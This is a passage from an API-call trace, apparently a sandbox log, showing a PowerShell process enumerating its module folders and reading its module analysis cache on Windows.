nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0159.010] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0159.010] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb507390a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4290 [0159.013] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb507390a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.013] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Operation.Validation", cAlternateFileName="MICROS~1.VAL")) returned 1 [0159.013] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0159.013] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0159.014] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0159.014] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0159.014] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.014] FindClose (in: hFindFile=0x76d4290 | out: hFindFile=0x76d4290) returned 1 [0159.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.016] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0159.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0159.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0159.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0159.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0159.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0159.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0159.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0159.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.017] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0159.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0159.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.018] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0159.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0159.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.019] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.020] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0159.020] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0159.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.020] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.020] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0159.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0159.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.021] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0159.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0159.021] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4250 [0159.022] FindNextFileW (in: hFindFile=0x76d4250, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.022] FindNextFileW (in: hFindFile=0x76d4250, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50df8d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a54419a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="103623~1.1")) returned 1 [0159.022] FindNextFileW (in: hFindFile=0x76d4250, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.022] FindClose (in: hFindFile=0x76d4250 | out: hFindFile=0x76d4250) returned 1 [0159.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.022] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0159.022] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0159.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.023] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e19133, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96e19133, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96e19133, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0159.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0159.027] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0159.028] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0159.028] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0159.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.028] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x534e25c | out: lpFileInformation=0x534e25c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e19133, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96e19133, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96e19133, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0159.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.031] GetEnvironmentVariableW (in: lpName="PSModuleAnalysisCachePath", lpBuffer=0x86ddb08, nSize=0xc3 | out: lpBuffer="연ĸ朤ؒ?࡭玦၀永က永က永᝖玿柎ꀡက永汃\x01耀연ĸ연ĸɨݞ?࡭獔浤\x02") returned 0x0 [0159.032] CoTaskMemAlloc (cb=0x20c) returned 0x13323c8 [0159.032] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x13323c8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0159.032] CoTaskMemFree (pv=0x13323c8) [0159.032] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1e [0159.032] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x1e, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local", lpFilePart=0x0) returned 0x1d [0159.032] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0x20 [0159.034] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0159.034] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x4f, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x4e [0159.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86de2a8) returned 1 [0159.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x790 [0159.034] GetFileType (hFile=0x790) returned 0x1 [0159.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86de2a4) returned 1 [0159.034] GetFileType (hFile=0x790) returned 0x1 [0159.035] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de31c, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de31c*=0x1000, lpOverlapped=0x0) returned 1 [0159.108] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.108] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.109] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.109] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.110] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.110] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.111] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.111] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.112] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.112] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0x1000, lpOverlapped=0x0) returned 1 [0159.112] ReadFile (in: hFile=0x790, lpBuffer=0x534f400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de324, lpOverlapped=0x0 | out: lpBuffer=0x534f400*, lpNumberOfBytesRead=0x86de324*=0xd4c, lpOverlapped=0x0) returned 1 [0159.113] GetEnvironmentVariableW (in: lpName="PSDisableModuleAnalysisCacheCleanup", lpBuffer=0x86de188, nSize=0xc3 | out: lpBuffer="") returned 0x0 [0159.114] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x86de2cc | out: UnbiasedTime=0x86de2cc) returned 1 [0159.314] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x86de2bc | out: UnbiasedTime=0x86de2bc) returned 1 [0159.315] CloseHandle (hObject=0x790) returned 1 [0159.316] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psd1")) returned 0xffffffff [0159.316] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psm1")) returned 0xffffffff [0159.316] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.cdxml")) returned 0xffffffff 